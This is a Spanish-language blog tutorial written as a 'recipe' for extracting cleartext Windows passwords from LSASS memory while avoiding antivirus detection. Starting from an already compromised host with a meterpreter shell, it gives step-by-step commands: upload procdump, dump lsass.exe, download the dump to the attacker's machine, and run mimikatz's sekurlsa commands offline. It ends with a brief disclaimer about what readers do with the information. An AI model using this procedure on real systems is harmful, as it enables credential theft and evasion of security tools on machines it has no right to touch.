Un AV (antivirus) tuvo a culpa y eso me permitió
conocer una manera de extraer el material de los sueños de un ordenador: la memoria RAM asociada al proceso LSASS, de una manera no
habitual.
NOTA: Este
proceso almacena en la memoria RAM asociada las contraseñas en claro de los
usuarios de un ordenador basado en un sistema Windows. Muchas herramientas,
lanzadas en local, permiten extraer esa información, como pueda ser: mimikatz o Empire mod HackPlayers.
Para la extracción del material de los sueños,
necesitaremos la siguiente lista de ingredientes:
1.- Una pizca de Procdump (herramienta perteneciente a la tool: SysInternals)
2.- Mimikatz,
pero ésta vez no lo utilizaremos en el ordenador remoto, si no en una máquina
virtual bajo nuestro control
3.- Entorno generador de máquinas virtuales.
Comencemos con la receta:
1.- Tener una Shell remota con
el ordenador
al cuál queramos extraerle las credenciales de sus usuarios EN TEXTO
CLARO.
NOTA: En
este punto no puede ayudar, cada uno como pueda.
Vulnerabilidad encontrada en
nuestro entorno de pruebas
Exploit preparado
Máquina vulnerada.
2.- Subir la ejecutable:
Procdump.
Este ejecutable, es un ejecutable “legitimo”
utilizado tanto en proceso de análisis forense como en procesos de
administración de sistemas. Nos permite dumpear/clonar la memoria RAM y
almacenarla en un archivo.
En nuestro entorno (Shell remota basada en
meterpreter) se ha utilizado el comando: upload <archivo a subir> <ubicación
en la máquina remota>
Archivo: procdump.exe subido
al disco duro: C:
Archivo: procdump.exe, ubicado en la unidad C: del host vulnerado
3.- Dumpear la memoria asociada
al proceso: lsass.exe
En este punto tenemos que tener en cuenta el
entorno en donde nos encontramos.
Entorno
|
Comando
|
Sistema de 32 bits
|
Procdump.exe
-accepteula –ma lsass.exe lsass.dump
|
Sistema de 64 bits
|
Procdump.exe
-accepteula -64 –ma lsass.exe lsass.dump
|
Leyenda:
-accepeula
-> permite aceptar la licencia
de Sysinternals por línea de comandos
-ma -> permite escribir un
archivo con la memoria extraída
-64 -> permite indicar
que estamos en un entorno de 64 bits.
Proceso de dumpeo lanzado y
completado
4.- Extraer el archivo anteriormente dumpeado del sistema
“hackeado”, llevándolo al sistema que tenemos controlado
En nuestro entorno (Shell remota basada en
meterpreter) se ha utilizado el comando: download <archivo ubicado en la máquina
remota> <ubicación en la máquina local>
Descarga del archivo dumpeado
5.- Montar una máquina virtual
con el mismo sistema operativo que el sistema del cual hemos extraído la
memoria RAM
Resumiendo
Nuevo entorno
6.- Ejecutar mimikatz sobre
el archivo que contiene la memoria RAM dumpeada.
Para lo cual:
1.-
Ejecutamos: mimikatz
2.-
Ejecutamos el comando: sekurlsa::mimidump
<archivo dumpeado>
3.- Ejecutamos el comando: sekurlsa::logonPasswords full
Ejecución de mimikatz en otro
entorno similar, en cuanto a sistema operativo, al que le hemos dumpeado la
memoria
En cualquier caso …
Lo que hagas con la información es cosa tuya, no
mía ... pero ten conciencia.